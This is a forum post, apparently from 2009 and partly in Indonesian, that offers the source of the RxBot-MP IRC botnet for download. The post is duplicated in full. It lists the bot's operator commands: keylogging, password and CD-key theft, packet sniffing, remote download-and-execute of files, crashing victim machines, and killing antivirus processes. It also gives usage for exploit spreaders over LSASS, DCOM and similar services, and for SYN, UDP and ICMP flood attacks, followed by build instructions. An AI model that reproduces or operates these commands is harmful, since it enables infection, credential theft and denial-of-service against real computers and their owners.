RxBot-MP with command [Download - Source]
Posted: Fri Oct 09, 2009 9:54 pm
bismillah hirrohmanirrohim.... hihii.... :tapa: :tapa: :tapa:
.login * login password
.logout * logout
.who * who
.getclip * getclip
.currentip * currentip
.rloginserver * " untested "
.get * get filename.zip
.redirect * redirect
.update * update Http://www.website.com/file.exe BotID.
.download * download http://website.Com/file.exe C:\file.exe 1 ( 1 = execute : 0 = don`t execute )
.execute * execute C:\file.exe
.findfile * findfile file.exe C:\
.findfilestop * findfilestop
.rename * rename botfilename.exe botfilename2.exe
.mode * mode +i-x
.version * version
.gethost * " untested "
.delay * " untested "
.secure * secure
.securestop * stopsecure
.unsecure * unsecure
.join * join #Channel
.part * part #Channel
.netinfo * netinfo
.sysinfo * sysinfo
.raw * raw #Channel +o Himmler
.prefix * prefix $
.open * open File
.server * server Irc.AnotherServer.net
.dns * dns host.name.net
.addalias * addalias " untested "
.privmsg * privmsg #channel hello / nickname fvck u
.action * " untested "
.cycle * " untested "
.die * kill ur bot.exe " is will be back after the next restart
.email * email mx3.hotmail.com [email protected] [email protected] subject msg
.httpcon * httpcon
.upload * upload
.reconnect * reconnect
.disconnect * disconnect
.status * status
.mirccmd * mirccmd " untested "
.cmd * cmd " untested "
.system reboot * restart bot victim machine
.system shutdown * shutdown bot victim machine
.system logoff * logoff bot victim machine
.threads * list threads
.killthread all * kill all threads
.getcdkeys * get cdkeys
.driveinfo * get drivers info
.opencmd * opencmd " untested "
.cmdstop * stopcmd " untested "
.httpserver * httpserver C:\ or D:\
.httpstop * stop http server
.tftpserver * " untested "
.tftpstop * " untested "
.crash * crash bot victim machine ( destroy all system )
.findpass * get bot victim passwords
.nick * change bot nick
.log * list bot log
.clearlog * clear log list
.procs * list all files running in bot victim P.c
.procsstop * procsstop File.exe
.killproc * killprocs File.exe
.delete * delete C:\File.exe
.list* list *.exe or *.zip or *.rar any extensions u want list from bot victim P.c
.visit * visit http://www.website.com ( hiding )
.readfile * readfile C:\file.txt
.psniff on * psniff on
.psniff off * psniff off
.remove * remove ( delete uor bot file from victim pc )
psniff can steal any information about
(bots net) (ftp) (php) (http) (mirc) (users) (accounts) (admins) (opers )
===========================================
.ident on * enable ident server
.ident off * disable ident server
.keylog on * enable key loger
.keylog off * disable key loger " net commands "
.net start * " untested "
.net stop * " untested "
.net pause * " untested "
.net continue * " untested "
.net delete * " untested "
.net share * " untested "
.net user * " untested "
.net send * " untested "
.capture video * " untested "
.capture screen * " untested "
.capture drivers * " untested "
.capture frame * " untested " " clone commands "
======================================
.clone irc.server.net:6667 #Channel " untested "
.c_join " untested "
.c_part " untested "
.C_raw " untested "
.c_mode " untested "
.c_nick " untested "
.c_privmsg " untested "
.c_notice " untested "
.c_rndnick " untested "
.clonestop " untested "
.c_quit " untested " ======================" exploit scanner commands"=========================
-r = random range scanner from the " Bot Ip " Ex: " the bot connect from ip ( 62.150.15.15 ) the -r scanning from 62.150.0.0 to 62.150.255.255 but in random method
-b = same -r but in Sequential method from 62.150.0.0 to 62.150.255.255
-a = long range scanner from first range of bot ip Ex: 62.0.0.0 to 62.255.255.255
-s = silent u can used with all Bot Commands, no reply msg from the bots
x = ip range ex: 0 to 255
u can scan fot ip range u choiced Ex: advscan lsass 100 5 999 62.150.x.x -r
100 = scanner threads
5 = delay in sec
999 = time of scanner
==================
" Exploit Spreader Commands "
.advscan lsass 100 5 999 -r * Lsass Exploit Spreader Using Port 445
.advscan iis5ssl 100 5 999 -b *IIS 5 SSL Exploit Spreader Using Port 443
.advscan dcom135 100 5 999 -a * Dcom Exploit Spreader Using Port 135
.advscan dcom445 100 5 999 -r -s * Dcom Exploit Spreader Using Port 445
.advscan dcom1025 100 5 999 -b -s * Dcom Exploit Spreader Using Port 1025 ( is shit )
.advscan dcom2-135 100 5 999 -a -s* Dcom2 Exploit Spreader Using Port 135
.advscan dcom2-445 100 5 999 -r * Dcom2 Exploit Spreader Using Port 445
.advscan beagle1 100 5 999 -r * Bagle Exploit Spreader Using Port 2745
.advscan beagle2 100 5 999 -r * Bagle2 Exploit Spreader Using Port 2745
.advscan webdav 100 5 999 -r * WebDav Exploit Spreader Using Port 80
.advscan wkssvc 100 5 999 -r * Wks Exploit Spreader Using Port 135
.advscan wkssvc2 100 5 999 -r * Wks Exploit Spreader Using Port 445
.advscan dameware 100 5 999 -r * DameWare Exploit Spreader Using Port 6129
.advscan upnp 100 5 999 -r * UPNP Exploit Spreader Using Port 5000
.advscan mydoom 100 5 999 -r * MyDoom Exploit Spreader Using Port 3127
.advscan netbios 100 5 999 -r * NetBios Exploit Spreader Using Port 139
.advscan ntpass 100 5 999 -r * NB+NP Exploit Spreader Using Port 445
.advscan mssql 100 5 999 -r * MSSQL Exploit Spreader Using Port 1433
.scanstats * Get Scan Stats
.scanstop * Stop Scanning ==========================================
Trojan Spreader Scanner Commands
.advscan optix 100 5 999 -r * Optix Trojan Spreader Using Port 3410
.advscan sub7 100 5 999 -r * Sub7 Trojan Spreader Using Port 27374
.advscan netdevil 100 5 999 -r * NetDevil Trojan Spreader Using Port 901
.advscan netdevil2 100 5 999 -r * NetDevil Trojan Spreader Using Port 903 ================================================== =========
Attack Commands " UnTested "
.icmpflood * icmpflood 62.150.15.15 99999
.synflood * synflood 62.150.15.15 1000 2000
.udpflood * udpflood Ip Number Size Delay
.pingflood * pingflood Ip Number Size Delay
.tcpflood * Ip Port r
r = random ?stop attacking commands
.icmpstop
.tcpstop
.synstop
.udpstop
.pingstop
---------------------------------------------------------------------
* added "Wks Spreader" with 2 commands "wkssvc = 135 / wkssvc2 = 445
* added "lsass exploit Spreader"
* added "iis5sll exploit spreader" fixed some lines
* update "Processes.cpp" with 660 AV/FW to kill on startup
* added " new port (901)&(903) to NetDevil Spreader "netdevil/netdevil2
* added " Php sniff " to psniff.cpp
* fixed "Sub7 port" to 27374 was 27347
* fixed "Optix port" to 3410 was 3140
* fixed 6 spreader commands in "advscan.cpp" ( true- false ) was ( false - false )
++++++++++++++++others++++++++++++++++
+ irc_connect line split truncation issue
+ disconnect for period of time and reconnect
+ p2p code add-in (for people who want it)
+ Registry editor
+ apache
+ iss
+ sll
---------------------------------------------------------------------------------------------
yang di perlukan: vb 6.0 dengan >
Service Sack 5 (*)
and the newest Platform sdk (**)
and the newest Processor Pack (***).
(*) http://msdn.microsoft.com/vstudio/do...es/sp/vs6/sp5/
(**) http://www.microsoft.com/msdownload/...sdk/sdkupdate/ (core sdk/build environment) (***) http://msdn.microsoft.com/vstudio/do...k/default.aspx
Install,kemudian tambahkan path ini ke
"tools|options...|directories" in visual studio (be sure to include them on top of the list):
to show directories for|Executable files: <path to sdk>\microsoft sdk\bin
to show directories for|Include files: <path to sdk>\microsoft sdk\include
to show directories for|Library files: <path to sdk>\microsoft sdk\lib
catatan:
1. pastikan jalan tambahan berada di daftar atas!
2. anda tidak perlu men-download SDK 129mb penuh, hanya core sdk/build environment.
3. harus di compile..
download source code :malumalu: :malumalu:
.login * login password
.logout * logout
.who * who
.getclip * getclip
.currentip * currentip
.rloginserver * " untested "
.get * get filename.zip
.redirect * redirect
.update * update Http://www.website.com/file.exe BotID.
.download * download http://website.Com/file.exe C:\file.exe 1 ( 1 = execute : 0 = don`t execute )
.execute * execute C:\file.exe
.findfile * findfile file.exe C:\
.findfilestop * findfilestop
.rename * rename botfilename.exe botfilename2.exe
.mode * mode +i-x
.version * version
.gethost * " untested "
.delay * " untested "
.secure * secure
.securestop * stopsecure
.unsecure * unsecure
.join * join #Channel
.part * part #Channel
.netinfo * netinfo
.sysinfo * sysinfo
.raw * raw #Channel +o Himmler
.prefix * prefix $
.open * open File
.server * server Irc.AnotherServer.net
.dns * dns host.name.net
.addalias * addalias " untested "
.privmsg * privmsg #channel hello / nickname fvck u
.action * " untested "
.cycle * " untested "
.die * kill ur bot.exe " is will be back after the next restart
.email * email mx3.hotmail.com [email protected] [email protected] subject msg
.httpcon * httpcon
.upload * upload
.reconnect * reconnect
.disconnect * disconnect
.status * status
.mirccmd * mirccmd " untested "
.cmd * cmd " untested "
.system reboot * restart bot victim machine
.system shutdown * shutdown bot victim machine
.system logoff * logoff bot victim machine
.threads * list threads
.killthread all * kill all threads
.getcdkeys * get cdkeys
.driveinfo * get drivers info
.opencmd * opencmd " untested "
.cmdstop * stopcmd " untested "
.httpserver * httpserver C:\ or D:\
.httpstop * stop http server
.tftpserver * " untested "
.tftpstop * " untested "
.crash * crash bot victim machine ( destroy all system )
.findpass * get bot victim passwords
.nick * change bot nick
.log * list bot log
.clearlog * clear log list
.procs * list all files running in bot victim P.c
.procsstop * procsstop File.exe
.killproc * killprocs File.exe
.delete * delete C:\File.exe
.list* list *.exe or *.zip or *.rar any extensions u want list from bot victim P.c
.visit * visit http://www.website.com ( hiding )
.readfile * readfile C:\file.txt
.psniff on * psniff on
.psniff off * psniff off
.remove * remove ( delete uor bot file from victim pc )
psniff can steal any information about
(bots net) (ftp) (php) (http) (mirc) (users) (accounts) (admins) (opers )
===========================================
.ident on * enable ident server
.ident off * disable ident server
.keylog on * enable key loger
.keylog off * disable key loger " net commands "
.net start * " untested "
.net stop * " untested "
.net pause * " untested "
.net continue * " untested "
.net delete * " untested "
.net share * " untested "
.net user * " untested "
.net send * " untested "
.capture video * " untested "
.capture screen * " untested "
.capture drivers * " untested "
.capture frame * " untested " " clone commands "
======================================
.clone irc.server.net:6667 #Channel " untested "
.c_join " untested "
.c_part " untested "
.C_raw " untested "
.c_mode " untested "
.c_nick " untested "
.c_privmsg " untested "
.c_notice " untested "
.c_rndnick " untested "
.clonestop " untested "
.c_quit " untested " ======================" exploit scanner commands"=========================
-r = random range scanner from the " Bot Ip " Ex: " the bot connect from ip ( 62.150.15.15 ) the -r scanning from 62.150.0.0 to 62.150.255.255 but in random method
-b = same -r but in Sequential method from 62.150.0.0 to 62.150.255.255
-a = long range scanner from first range of bot ip Ex: 62.0.0.0 to 62.255.255.255
-s = silent u can used with all Bot Commands, no reply msg from the bots
x = ip range ex: 0 to 255
u can scan fot ip range u choiced Ex: advscan lsass 100 5 999 62.150.x.x -r
100 = scanner threads
5 = delay in sec
999 = time of scanner
==================
" Exploit Spreader Commands "
.advscan lsass 100 5 999 -r * Lsass Exploit Spreader Using Port 445
.advscan iis5ssl 100 5 999 -b *IIS 5 SSL Exploit Spreader Using Port 443
.advscan dcom135 100 5 999 -a * Dcom Exploit Spreader Using Port 135
.advscan dcom445 100 5 999 -r -s * Dcom Exploit Spreader Using Port 445
.advscan dcom1025 100 5 999 -b -s * Dcom Exploit Spreader Using Port 1025 ( is shit )
.advscan dcom2-135 100 5 999 -a -s* Dcom2 Exploit Spreader Using Port 135
.advscan dcom2-445 100 5 999 -r * Dcom2 Exploit Spreader Using Port 445
.advscan beagle1 100 5 999 -r * Bagle Exploit Spreader Using Port 2745
.advscan beagle2 100 5 999 -r * Bagle2 Exploit Spreader Using Port 2745
.advscan webdav 100 5 999 -r * WebDav Exploit Spreader Using Port 80
.advscan wkssvc 100 5 999 -r * Wks Exploit Spreader Using Port 135
.advscan wkssvc2 100 5 999 -r * Wks Exploit Spreader Using Port 445
.advscan dameware 100 5 999 -r * DameWare Exploit Spreader Using Port 6129
.advscan upnp 100 5 999 -r * UPNP Exploit Spreader Using Port 5000
.advscan mydoom 100 5 999 -r * MyDoom Exploit Spreader Using Port 3127
.advscan netbios 100 5 999 -r * NetBios Exploit Spreader Using Port 139
.advscan ntpass 100 5 999 -r * NB+NP Exploit Spreader Using Port 445
.advscan mssql 100 5 999 -r * MSSQL Exploit Spreader Using Port 1433
.scanstats * Get Scan Stats
.scanstop * Stop Scanning ==========================================
Trojan Spreader Scanner Commands
.advscan optix 100 5 999 -r * Optix Trojan Spreader Using Port 3410
.advscan sub7 100 5 999 -r * Sub7 Trojan Spreader Using Port 27374
.advscan netdevil 100 5 999 -r * NetDevil Trojan Spreader Using Port 901
.advscan netdevil2 100 5 999 -r * NetDevil Trojan Spreader Using Port 903 ================================================== =========
Attack Commands " UnTested "
.icmpflood * icmpflood 62.150.15.15 99999
.synflood * synflood 62.150.15.15 1000 2000
.udpflood * udpflood Ip Number Size Delay
.pingflood * pingflood Ip Number Size Delay
.tcpflood * Ip Port r
r = random ?stop attacking commands
.icmpstop
.tcpstop
.synstop
.udpstop
.pingstop
---------------------------------------------------------------------
* added "Wks Spreader" with 2 commands "wkssvc = 135 / wkssvc2 = 445
* added "lsass exploit Spreader"
* added "iis5sll exploit spreader" fixed some lines
* update "Processes.cpp" with 660 AV/FW to kill on startup
* added " new port (901)&(903) to NetDevil Spreader "netdevil/netdevil2
* added " Php sniff " to psniff.cpp
* fixed "Sub7 port" to 27374 was 27347
* fixed "Optix port" to 3410 was 3140
* fixed 6 spreader commands in "advscan.cpp" ( true- false ) was ( false - false )
++++++++++++++++others++++++++++++++++
+ irc_connect line split truncation issue
+ disconnect for period of time and reconnect
+ p2p code add-in (for people who want it)
+ Registry editor
+ apache
+ iss
+ sll
---------------------------------------------------------------------------------------------
yang di perlukan: vb 6.0 dengan >
Service Sack 5 (*)
and the newest Platform sdk (**)
and the newest Processor Pack (***).
(*) http://msdn.microsoft.com/vstudio/do...es/sp/vs6/sp5/
(**) http://www.microsoft.com/msdownload/...sdk/sdkupdate/ (core sdk/build environment) (***) http://msdn.microsoft.com/vstudio/do...k/default.aspx
Install,kemudian tambahkan path ini ke
"tools|options...|directories" in visual studio (be sure to include them on top of the list):
to show directories for|Executable files: <path to sdk>\microsoft sdk\bin
to show directories for|Include files: <path to sdk>\microsoft sdk\include
to show directories for|Library files: <path to sdk>\microsoft sdk\lib
catatan:
1. pastikan jalan tambahan berada di daftar atas!
2. anda tidak perlu men-download SDK 129mb penuh, hanya core sdk/build environment.
3. harus di compile..
download source code :malumalu: :malumalu: